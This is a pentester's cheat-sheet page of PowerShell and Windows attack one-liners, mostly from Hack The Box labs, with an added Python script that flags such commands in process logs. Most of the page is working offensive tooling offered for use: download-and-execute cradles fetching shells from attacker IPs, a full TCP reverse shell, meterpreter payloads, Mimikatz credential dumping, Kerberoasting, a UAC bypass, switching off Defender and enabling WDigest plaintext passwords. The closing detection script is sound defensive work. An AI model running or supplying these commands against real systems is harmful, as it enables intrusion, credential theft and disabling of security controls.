puckiestyle – Educating and Learning is our style


whoami: Network / System Engineer, MCSE 2012, OSCP 2020, HackTheBox Omniscient, Pentester, Security specialist, Auditor


PowerShell one-liners

PowerShell (any version):

(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.19/shell-443.exe", "C:\FTP\Intranet\shell-443.exe")
PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")
C:\> PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.178.16:8000/launcher.bat','launcher.bat'); Start-Process 'launcher.bat'
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.178.16',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PS C:\Users\hillie> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell443.ps1')
C:\Users\hillie>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=HTB\Administrator
Type: Domain Password
User: HTB\Administrator
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [28/Feb/2019 19:38:58] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
c:\Users\Public>certutil -urlcache -split -f http://10.10.14.20/puckieshell443.ps1
PS C:\pentest> certutil.exe -f -split -VerifyCTL http://192.168.178.12/msbuild_nps.xml
CertUtil: -verifyCTL command FAILED: 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG)
CertUtil: ASN1 bad tag value met.

PS C:\pentest> dir *.bin

Directory: C:\pentest

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2019   4:16 PM           5462 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin

PS C:\pentest> mv 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin msbuild_nps.xml

PS C:\pentest> dir *.xml

Directory: C:\pentest

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2019   4:16 PM           5462 msbuild_nps.xml
C:\Users\Public> runas /user:HTB\administrator /savecred "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')"
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.xx: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.98] 49167: NO_DATA
Windows PowerShell running as user Administrator on HTB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
HTB\administrator
root@kali:~/htb/access# echo -n "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA=
c:\Users\Public> runas /user:ACCESS\administrator /savecred "powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA="
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.178.13/powercat.ps1');powercat -c 192.168.178.13 -p 1234 -e cmd


PowerShell 4.0 & 5.0:

PS C:\Users\hillie> Invoke-WebRequest "http://192.168.178.50/shell-443.exe" -OutFile "C:\FTP\intranet\shell-443.exe"
xp_cmdshell "PowerShell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')"
xp_cmdshell "PowerShell IEX(IWR('http://10.10.14.20/puckieshell443.ps1'))"


c:\inetpub\wwwroot\internal-01\log>powershell
powershell
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

Cannot load PSReadline module. Console is running without PSReadline.
PS C:\inetpub\wwwroot\internal-01\log> $username = 'BART\h.potter'
PS C:\inetpub\wwwroot\internal-01\log> $securePassword = ConvertTo-SecureString -AsPlainText -Force 'Password1'
PS C:\inetpub\wwwroot\internal-01\log> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
PS C:\inetpub\wwwroot\internal-01\log> Enter-PSSession -ComputerName localhost -Credential $credential
[localhost]: PS C:\Users\h.potter\Documents> whoami
bart\h.potter
[localhost]: PS C:\Users\h.potter\Documents> [System.Environment]::Is64BitOperatingSystem
True
[localhost]: PS C:\Users\h.potter\Documents> [System.Environment]::Is64BitProcess
True

PS C:\users> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16:8000/Sherlock.ps1')

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerup.ps1');Invoke-AllChecks"
PS C:\Users\hillie>(new-object net.webclient).downloadfile('http://10.10.14.20/powerup.ps1', 'C:\users\mssql-svc\appdata\local\temp\powerup.ps1')
PS C:\users\mssql-svc\appdata\local\temp> import-module ./powerup.ps1
   [*] Running Invoke-AllChecks

PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/invoke-mimikatz.ps1');Invoke-Mimikatz"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerview.ps1');Get-IPAddress"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/windowsenum.ps1')"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/jaws.ps1')"

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.78.50 -Lport 4444

d:\PENTEST\impacket-examples-windows-master>psexec puckiestyle.local/administrator@192.168.178.200
PS D:\PENTEST\impacket-examples-windows-master> Connect-PSSession -ComputerName 192.168.178.200 -Credential administrator

C:\WINDOWS\system32>psexec.exe \\192.168.178.200 -u puckiestyle\puck -p p@ssw0rd cmd.exe

wmic /NODE:"DC01" /USER:"puckiestyle\administrator" OS GET Name

wmic /node:192.168.23.214 NIC get description,macaddress

wmic /USER:"puckiestyle\puck" /PASSWORD:"p@ssw0rd" /NODE:192.168.178.200 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt"

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

rundll32.exe user32.dll,LockWorkStation

root@kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o mrshell-p443.exe
root@kali# msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.20; set lport 443; set ExitOnSession false; exploit -j"
PS C:\WINDOWS\system32> Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\WINDOWS\system32> Set-MpPreference -DisableIOAVProtection $true
Change Claire's password to Password!
Powershell Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String 'Password1!' -AsPlainText -Force) -Identity Claire

Log in as Claire and grant Tom access to Backup_Admins
Powershell Add-ADGroupmember -Identity Backup_Admins -Members tom

Want to add a brand new executable extension (also callable from a .bat)?

C:\Users\jacco>set PATHEXT=%PATHEXT%;.puck
C:\Users\jacco>set pathext
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.puck

Want to know Applocker status from a cmd shell?

powershell -nop -c "import-module applocker; get-command *applocker*"
powershell -nop -c "import-module applocker; Get-AppLockerPolicy -Effective -Xml"

Set TrustedHosts with PowerShell (as Admin)

Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value "Computer1,Computer2"

And check (don’t need Admin for that)

Get-Item WSMan:\localhost\Client\TrustedHosts
c:\users\public>powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')
root@kali:~/htb/optimum# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [09/Apr/2019 10:06:51] "GET /puckieshell53.ps1 HTTP/1.1" 200 -
root@kali:~/htb/optimum# nc -lvp 53
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 10.10.10.8.
Ncat: Connection from 10.10.10.8:49541.
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop> [System.Environment]::Is64BitOperatingSystem
True
PS C:\Users\kostas\Desktop> [System.Environment]::Is64BitProcess
True
PS C:\users> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/Invoke-MS16135.ps1", "c:\users\public\Invoke-MS16135.ps1")
PS C:\users\public> import-module ./Invoke-MS16135.ps1 
PS C:\users\public> Invoke-MS16135 -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell53.ps1')"
[MS16-135 banner by b33f -> @FuzzySec]


[!] Success, spawning a system shell! 

root@kali:~/htb# nc -lvp 53
listening on [any] 53 ...
192.168.178.11: inverse host lookup failed: Unknown host
connect to [192.168.178.16] from (UNKNOWN) [192.168.178.11] 49238
Windows PowerShell running as user hillie on HILLIE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\users\public>whoami
nt authority\system
PS C:\users\public>
If you ever need to enable RDP (mstsc) on a Windows 10 machine and you can't get to the System control panel item, use PowerShell to enable RDP:

Execute the cmdlets above as Administrator in PowerShell, and RDP should work.

To test the connection, open Powershell on another machine, and run:

PS C:\Users\jacco> Test-NetConnection 10.10.10.97 -CommonTCPPort rdp


ComputerName : 10.10.10.97
RemoteAddress : 10.10.10.97
RemotePort : 3389
InterfaceAlias : Ethernet 2
SourceAddress : 10.10.14.12
TcpTestSucceeded : True

PS C:\Users\jacco>
PS C:\Users\jacco> [Convert]::ToBase64String([IO.File]::ReadAllBytes( "C:\PENTEST\secret.txt"))
ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr
PS C:\Users\jacco>
PS C:\pentest> [IO.File]::WriteAllBytes( "c:\pentest\new.txt" ,[Convert]::FromBase64String( "ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr"))
PS C:\pentest> type new.txt
dit bestand is geheim
groetjes Puck
# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"

# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)

# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe

# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
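The one-liners on this page are exactly what a blue team wants to see in process-creation telemetry. The following Python script is an added example, not part of the original page: it takes the CommandLine field of Sysmon Event ID 1 / Security Event ID 4688 records (constructed in-memory sample events here), decodes any -EncodedCommand payload the way the iconv/base64 pipeline earlier on the page built it (base64 of UTF-16LE), and flags download cradles, the WDigest UseLogonCredential registry change, Defender real-time protection being switched off, and runas /savecred. The second sample event carries the base64 string from this page; the 203.0.113.5 address and all function names are constructed for the example.

```python
"""Triage Windows process-creation command lines for the PowerShell one-liner
patterns collected on this page. Added example, not part of the original page.
Input is the CommandLine field of Sysmon Event ID 1 / Security Event ID 4688,
supplied here as a constructed in-memory list."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# forms commonly seen. The payload is base64 of a UTF-16LE string.
ENC_FLAG = re.compile(
    r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# One regex per technique; matched against the raw line plus any decoded payload.
PATTERNS = {
    "web_download": re.compile(
        r"Net\.WebClient\b.*?\.Download(?:String|File)\b|Invoke-WebRequest\b|\bIWR\b"
        r"|certutil(?:\.exe)?\b.*?-(?:urlcache|VerifyCTL)\b", re.I),
    "inline_exec": re.compile(r"\bIEX\b|Invoke-Expression\b", re.I),
    "exec_policy_bypass": re.compile(r"-(?:exec|ep|executionpolicy)\s+bypass\b", re.I),
    "wdigest_plaintext_creds": re.compile(r"WDigest\b.*?UseLogonCredential\b", re.I),
    "defender_disable": re.compile(r"Set-MpPreference\b.*?-Disable\w+\s+\$true\b", re.I),
    "runas_savecred": re.compile(r"\brunas\b.*?/savecred\b", re.I),
}


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad base64 (binascii.Error) or undecodable UTF-16LE bytes
        return None


def triage(cmdline):
    """Classify one command line; returns the decoded payload and matched techniques."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline} {decoded}"
    hits = [name for name, rx in PATTERNS.items() if rx.search(text)]
    # Download plus in-memory execution in one line is the classic cradle.
    if "web_download" in hits and "inline_exec" in hits:
        hits.append("download_cradle")
    return {"decoded": decoded, "hits": hits}


def scan(events):
    """Return (cmdline, triage result) for every event that matched something."""
    results = [(cmd, triage(cmd)) for cmd in events]
    return [(cmd, r) for cmd, r in results if r["hits"]]


# Constructed sample events. Event 1 carries the base64 string from this page
# (it decodes to the puckieshell53.ps1 download cradle); 203.0.113.5 is a
# documentation-range placeholder address.
SAMPLE_EVENTS = [
    'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"',
    'runas /user:ACCESS\\administrator /savecred "powershell -EncodedCommand '
    'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA'
    'LgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4A'
    'MQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA="',
    r'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    ' /v UseLogonCredential /t REG_DWORD /d 1 /f',
    'powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true',
    'certutil.exe -urlcache -split -f http://203.0.113.5/tool.ps1 tool.ps1',
]

if __name__ == "__main__":
    for cmd, r in scan(SAMPLE_EVENTS):
        print(f"{', '.join(r['hits'])}\n    {cmd}")
        if r["decoded"]:
            print(f"    decoded: {r['decoded']}")
```

Run it as-is to see the four flagged events; in practice feed it the CommandLine column exported from your SIEM. Decoding before matching is the important design choice: an encoded cradle contains none of the keywords in plain text, so a rule that only inspects the raw command line misses exactly the variant shown at the runas /savecred step above.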
(c)2020